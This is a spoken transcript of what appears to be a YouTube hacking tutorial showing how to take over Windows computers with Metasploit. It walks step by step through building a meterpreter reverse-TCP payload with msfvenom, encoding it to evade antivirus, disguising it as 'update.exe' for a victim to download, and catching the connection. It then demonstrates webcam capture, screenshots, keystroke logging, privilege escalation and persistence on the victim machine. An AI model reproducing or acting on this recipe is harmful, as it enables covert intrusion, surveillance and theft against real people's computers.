What's going on, guys? Welcome to Newbie Tech, and today I'm here with a new video, and in this video I'm going to be showing you guys how to hack a device running Windows operating system. It could be running Windows Vista, Windows 7 or Windows 8, 8.1 or 10, doesn't matter. So before going into the video, I would like to thank all my viewers and subscribers for supporting me. So without much delay, let's get started. So first of all, I want you guys to open up a new terminal, log in as root, and check whether or not if you have Metasploit installed. If you don't have Metasploit installed, you could always do apt-get install Metasploit framework. I have Metasploit pre-installed, so I assume that you have already installed Metasploit framework. First of all, what we are going to be doing is we are going to be creating a payload that we can deliver to the victim computer, and the payload will connect to our Metasploit server, and in that way we can gain the control of the victim machine. To create a payload, we are going to be using the MSF Venom. So do MSF Venom dash help. So this should give you a little bit of help section related to the MSF Venom command. So let me just put this aside and open up a new terminal so that I can just see and take help from this section. Let's create a payload using the MSF Venom command. It's not difficult, it's just like filling out a form. So do MSF Venom dash payload space and the name of the payload. We are going to be using the Windows / Metasploit / reverse TCP. This is the payload that we are going to be using because the Metasploit shell is always a good to have shell, and reverse TCP is the type of connection that we are going to be using because we want our host to connect back to us. Now this will prevent some of the firewalls from blocking us, so let's just use the reverse TCP connection. Now we have the payload already defined, so let's do lhost. Since our payload needs the lhost, it means localhost. It's the IP address of the attacker, so basically it's your IP address. So do ifconfig and you could just see your IP address in the interface section. My one is 192.168.1.0, sorry, 1.8. This is my local IP address. So if you are going to be targeting a victim that is not in your local network, then you should use your public IP. In order to get the public IP, you could do curl call ifconfig.co. Now this should give you your public IP. If you are targeting a victim who is not in your local area network, you should use your public IP. But make sure you do a port forwarding of the necessary ports because all the ports are going to be blocked by default. So make sure you port forward before using your public IP address. So in this tutorial I'm going to be using my local IP address. So paste it here, and we need L port equals, I'm going to be using 8080. It really doesn't matter which port you use. Okay, so we can now set format as we have here -f for output format. Now since we are targeting a Windows computer, we are going to be doing exe format. We can also do --plat platform, which is Windows --arts for architecture x86, which means 32-bit computer. Now finally the encryption, so -e, as you can see here, the encryption, the encoder -e, we are going to be using x86/sakita_ga_nai space. This is the encoder that we are going to be using. -i, this is the number of iteration used to encode the file, so keep it 5 or 10. Don't keep it like above 20 because it will just slow down the exe file and slows down the execution. The exe file may just crash. Now let's just send all of this to a file. So do a greater than sign, send it to var www.html and the name of the file, let's just call it update.exe. So hit enter. Now this should generate your payload. As you can see, the payload is successfully generated and it's in var/www/html update.exe. The reason why I set the payload onto this folder is so that I can access it through the Apache web server. So now next we are going to be starting the Apache web service, service Apache to start. Okay, we can also do service PostgreSQL start, because this is the service that Metasploit needs for database management. Now we can start Metasploit using msf console command. Let me just show you the exe file that we have just created. This is the exe file, exe, sorry. So we are inside the Metasploit framework. Let's get started on the Metasploit framework. So let's do use exploit multi-handler. So the handler exploit is enabled. Set payload to Windows/Metasploit and reverse_TCP, like we did some minutes ago. So let's do set lhost space, the same IP that we used a while ago, that 1.8. Set al port 8080. Okay, do show options, and we can see that all of the necessary configurations has been filled. Now before exploiting, we should make sure that the target runs our exe file. So in my case, I have just created a virtual machine, or Windows 7 virtual machine, and I'm going to be using this virtual machine as a victim. So let me just download the update.exe file. So this is the reason why I send the update.exe file to that specific folder, so that I can access it from here. Okay, so I have downloaded the exe file. It's in my, as you can see, download folder. Let me just, okay, so now let's just do exploit, and it's gonna listen to 192.168.1.8 and on 8080 port. So once the victim executes the update.exe file, we're gonna get a Metasploit cell. See, Metasploit session 1 opened at this location at this specific time. Okay, since we have the Metasploit cell, so let's just do system info, and we can see that this computer is now in our control. This is Windows 7 machine, 64-bit and stuff like that. Okay, you could always do help to see other commands that you can use inside the Metasploit cell. Now these are the things that you can perform once you have successfully compromised the victim computer. Let me just show you guys some examples of it. The first thing you could do is, okay, you could do execute -app, and any command you want to execute on the victim's machine. Let's just do cmd. It's gonna open the command prompt, and as you can see, it has opened the command prompt on the victim machine. Now you can basically do anything. Let's see multiple command prompts on the victim machine. Now there are some of the other options as well. You could do a webcam snap. It means that it will use the victim's webcam in order to capture a photo and send back to you. You can do a screenshot. Let's just do a screenshot. Screenshot saved to this location. Let's just see it. Okay, so we have the screenshot here. So I want you guys to go through every set of commands that are present in here. They are all fun commands to use. Now to make sure that the hack is persistent, and you could always do run persistence. You can always do run persistence, and it will connect back to you even if the victim restarts his or her computer. You could do PS to see all the processes. You could do migrate to any of the process you want. Suppose I want to migrate to explorer.exe, so I could do 1784 to migrate to that specific process. See, migration completed successfully. There are some of the other commands, tons of other commands to use. There are several other commands to use. For example, you got the key scan dump. It's gonna scan all the keystrokes and dump it. You have the get system command. It's gonna give you administrative access. Okay, so you could do a bunch of things. So to exit, let me just exit from the Metasploit framework. Okay, so as you can see that with Metasploit you can hack into any Windows machine if you can deliver the payload to it. So antivirus and such things cannot detect this payload because they are encoded using the different algorithm, and they are encoded multiple times, like we did 5 times on our case. We could also use the veil evasion to pass through the antiviruses. So I'm gonna be doing the video regarding veil evasion later on. This is the end of the video. Thank you guys for watching. I hope you enjoyed it, and I hope that you learned something from this video. Okay, see you next time. Have fun.